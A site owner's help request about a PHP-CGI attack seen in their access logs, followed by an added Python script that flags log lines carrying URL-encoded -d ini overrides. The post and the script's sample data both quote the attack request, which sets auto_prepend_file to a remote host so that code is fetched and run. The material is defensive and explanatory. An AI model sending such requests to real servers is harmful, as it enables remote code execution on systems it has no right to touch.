Need assistance with php.ini security issue

I have recently cleared malicious code and htaccess files off of a couple of my websites and changed the passwords. Since then I have been watching my access logs and I can see routinely there is someone trying to run commands like this:

"GET /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F000.000.000.000%2Finfo3.txt

I removed the IP address that was in the link they are trying to use in the auto_prepend_file option because I got a virus when I tried connecting to it from my computer. My question is simply: is there an easy way to disable the -d 'switches' they are trying to use to override the php.ini settings? If not, would making a function to run the $_GET array through to check for a pattern match be an effective way of stopping those settings from being used? From what I understand, the auto_prepend_file is a file that runs before the page loads. Any advice is appreciated.
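
A log check for the request pattern quoted in the post, as an added example that is not part of the original post: it reports access-log lines whose query string starts with "-", contains no literal "=", and carries -d ini overrides once URL-decoded. The sample log lines, the client addresses and the function names are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Request field of a combined-format access log line: "METHOD target PROTOCOL"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+)')
# One "-d name=value" ini override, as it looks after URL-decoding
INI_OVERRIDE_RE = re.compile(r'(?:^|\s)-d\s*([A-Za-z_.]+)=(\S*)')

# Constructed sample lines; the second reuses the (redacted) request from the post.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:00:00:01 +0000] '
    '"GET /index.php?page=2&sort=-date HTTP/1.1" 200 512',
    '192.0.2.77 - - [01/Jan/2024:00:00:02 +0000] '
    '"GET /index.php?-dsafe_mode%3dOff+-dallow_url_include%3dOn'
    '+-dauto_prepend_file%3dhttp%3A%2F%2F000.000.000.000%2Finfo3.txt HTTP/1.1" 200 0',
]

def ini_overrides(log_line):
    """Return {directive: value} for -d switches found in the query string."""
    m = REQUEST_RE.search(log_line)
    if not m or "?" not in m.group(1):
        return {}
    raw_query = m.group(1).split("?", 1)[1]
    # As in the logged request: the query starts with "-" and every "=" is
    # sent as %3d, so it is not an ordinary key=value query string.
    if not raw_query.startswith("-") or "=" in raw_query:
        return {}
    decoded = unquote_plus(raw_query)  # "+" -> space, %3d -> "="
    return dict(INI_OVERRIDE_RE.findall(decoded))

def scan(lines):
    """Return (client_ip, sorted directive names) for each suspicious line."""
    hits = []
    for line in lines:
        found = ini_overrides(line)
        if found:
            hits.append((line.split(" ", 1)[0], sorted(found)))
    return hits

if __name__ == "__main__":
    for ip, names in scan(SAMPLE_LOG):
        print(ip, "tried to override:", ", ".join(names))
```

To run it over a real log, pass the open file object to `scan()`, which reads it line by line.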